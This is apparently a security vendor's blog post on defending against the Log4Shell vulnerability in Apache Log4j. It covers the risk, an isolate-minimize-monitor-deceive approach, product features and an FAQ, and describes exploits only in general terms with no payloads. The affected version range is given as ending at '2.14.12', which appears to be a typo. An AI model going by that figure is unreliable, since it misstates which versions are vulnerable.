Products
- Products
  
  Platform
  ShadowPlex Advanced Threat Defense
  Deception for early detection of cyber threats with precision and speed
  
  ShadowPlex Identity Protection
  Visibility, management and protection of identity stores and attack paths
  Acalvio Active Defense Platform
  Comprehensive and Award-winning Distributed Deception Platform
  
  What is Active Defense?
  Active defense detects and diverts attacks.
  
  Why do I need Acalvio Active Defense?
  Active Defense deceives and disrupts attackers.
Solutions
- Technology Solutions
  
  Industry Solutions
  Early Threat Detection
  Detect cyber threats early in the attack lifecycle to prevent adversary breakout
  
  Identity Threat Detection & Response
  Detect identity threats with precision and protect the identity architecture
  
  OT Security
  Protect OT environments from cyber threats with an easy-to-deploy and non-intrusive solution
  
  Red Teaming
  Strengthen defenses to detect red team activities
  
  Threat Hunting
  Active threat hunting to confirm latent threats and gain visibility to attacker TTPs
  
  Ransomware
  AI-driven deception to protect against known and zero-day ransomware variants
  
  Honeytokens for CrowdStrike
  Enterprise-scale honeytokens to protect against current and evolving identity threats
  
  Active Directory Protection
  Visibility to AD attack surface and detection of AD attacks
  
  Zero Trust
  Advance Zero Trust maturity through improved cyber visibility
  
  Insider Threats
  Unmask hidden dangers. Cyber deception for high-fidelity insider threat detection
  Public Sector
  Targeted solution for protecting Federal agencies in conformation with NIST and CISA recommendations
  
  Financial Services
  Transform Financial Cybersecurity with Innovative Cyber Deception and Active Defense
  
  Healthcare
  Active defense solutions thwart healthcare attacks before they can inflict real damage.
Resources
Partners
Company

Combating Log4Shell Exploits

by Team Acalvio | September 01, 2023

Why Is a Log4Shell Exploit Considered a Serious Risk to Enterprises?

Apache Log4j is used in thousands of enterprise applications across the stack and appliances with a web interface. Log4j is also an embedded component of many Java-based OT/ICS hardware and software components. Billions of IoT devices built on Java may also be susceptible to the Log4Shell vulnerability, as are many networking appliances. Multiple Apache Log4j versions are affected by Log4Shell. Log4Shell also affects many systems that are internal to enterprise networks. APTs/attackers that are already inside the network may leverage the Log4Shell vulnerability of the internal systems.

The vulnerability is severe enough for CISA, FBI, and NSA to release a joint Advisory stating “Log4j vulnerabilities present a severe and ongoing threat to organizations and governments around the world; we implore all entities to take immediate action to implement the latest mitigation guidance to protect their networks.”

Successful exploitation of Log4Shell on a system can enable the threat actor to take full control of the system.

Mass scanning attempts by threat actors to identify vulnerable systems are ongoing. In addition, botnets like Mirai, remote access toolkits, and reverse shells such as Meterpreter have expanded to leverage the Log4Shell vulnerability. Threat actors are also finding new ways to exploit this vulnerability by, for example, exploiting internal systems in the enterprise and leveraging these systems to conduct post exploitation activity.

Patching Log4Shell vulnerable versions of various systems and applications will take a long time. Patching may not even be possible for certain embedded systems. Existing detection methods rely on signatures and threat actors have started circumventing such simple detection methods by using payload obfuscation.

What Can IT Security Teams Do to Protect Against Log4Shell Exploits?

To protect against Log4Shell attack attempts, IT Security teams should apply the patches released by the Apache Software Foundation and by the vendors of software and hardware that are affected by the Log4Shell vulnerability. For systems that cannot be patched and for systems for which patches will take a while to be released, IT Security teams should follow the IMMA approach:

(I)solate: This step involves segregating the vulnerable systems to reduce pathways from those systems to other parts of the network.

(M)inimize: This step refers to minimizing the attack surface that an attacker can use to reach vulnerable systems. This can be done by, for example, disabling unnecessary services or reducing privileges.

(M)onitor: This step involves closely watching system logs and network traffic for signs of a Log4Shell exploit attempt.

(A)ctive Defense: This step involves implementing measures like using deception technology to detect attackers and deflect them away from vulnerable systems.

What Capabilities Does Acalvio ShadowPlex Provide to Counter the Log4Shell Vulnerability?

Acalvio ShadowPlex provides the following Active Defense capabilities to effectively counter the Log4Shell vulnerability:

1. Gain visibility into Log4Shell vulnerable assets

2. Actively protect Log4Shell vulnerable assets

3. Generate Threat Intelligence

Visibility

The first step in combating the Log4Shell vulnerability is to gain visibility into affected systems. Acalvio ShadowPlex provides a reliable, safe, and easy-to-deploy capability to automatically discover Log4Shell vulnerable assets across IT, Cloud, IoT, and OT environments. A single click from the ShadowPlex Admin Console will discover the Log4Shell vulnerable assets. There are no scripts to run manually, and no cloud services are required for the setup.

Unlike traditional vulnerability scanners, Acalvio ShadowPlex does not require access to the asset’s filesystem. The Acalvio approach works for any kind of remote service, device, or application without requiring any special asset access, firewall changes, or sensitive login credentials.

Asset Protection

Most vendors need time to create and test Log4Shell vulnerability patches. Also, application of patches can be very challenging in many mission-critical environments such as OT/ICS networks. Acalvio ShadowPlex provides the ability to leverage deception deployment on and around vulnerable assets to quickly detect Log4Shell exploit attempts.

A malicious actor needs to attempt an exploit to determine whether a system is vulnerable. This provides an excellent opportunity to leverage Acalvio’s active defense and just-in-time deception platform to detect and respond to exploit attempts from inside the organization’s IT, OT, IoT, and Cloud environments.

Generate Threat Intelligence

The Acalvio ShadowPlex platform can be leveraged to generate Threat Intelligence (TI) using deception technology. This TI is specific to Log4Shell exploits and covers new obfuscation techniques and attacker-controlled IPs that can be blocked. This TI can be very useful for MDR solutions, and large enterprises to get ahead of Log4Shell exploit attempts.

Frequently Asked Questions

Is Log4Shell still a threat?

Yes, IT Security teams still consider Log4Shell a threat. Researchers have noticed a steady stream of attacks attempting to exploit the Log4j vulnerability. At the same time, several attacks that leverage Log4Shell may be going unnoticed.

What is vulnerable to Log4Shell?

The Log4Shell vulnerability primarily affects systems that use the Apache Log4j library. Here are some types of systems that could be vulnerable:

Servers and Web-based Applications: These are the most vulnerable systems as they often use the Log4j library for logging purposes.
IT Systems: IT systems that use software applications and online services incorporating the Log4j library are at risk.
OT Systems: Operational Technology (OT) systems such as SCADA (Supervisory Control and Data Acquisition) systems and IoT (Internet-of-Things) devices are also at risk.

Does Log4Shell affect personal computers?

Personal computers, laptops, and mobile devices may be using software that includes the Log4j library, but they are not generally at risk unless they are running server-like processes. However, certain PC users who are running a Java environment or playing games like Minecraft Java Edition could potentially be affected.

What are the steps for Log4Shell detection on my system?

To determine if your system is affected by the Log4Shell vulnerability, you can follow these general steps:

Identify Usage of Log4j: Check if your applications or services are using the Apache Log4j library. This can be done by reviewing the application’s dependencies or by performing a software composition analysis.
Check the Version: The vulnerability affects Apache Log4j versions from 2.0-beta9 to 2.14.12. If your application is using these versions of Log4j, it may be vulnerable.
Scan for Vulnerabilities: Acalvio ShadowPlex provides capabilities that enable a Security team to gain visibility into applications and services that carry the Log4Shell vulnerability. For more information, see Visibility.

Are there any examples of Log4Shell exploits?

The following are some Log4Shell exploit examples:

Malware Exploitation: Certain malware families like Bazarloader and Mirai, as well as various Cryptocurrency Mining Software, have been observed exploiting Log4Shell.
Spring Boot Web Application: A sample vulnerable Spring Boot web application was created to demonstrate how Log4Shell can be exploited. The exploitation process involves using a malicious LDAP server and triggering the exploit using a specific curl command.
Minecraft PoC: A proof of concept (PoC) was demonstrated using Minecraft, which is known to use the Log4j library.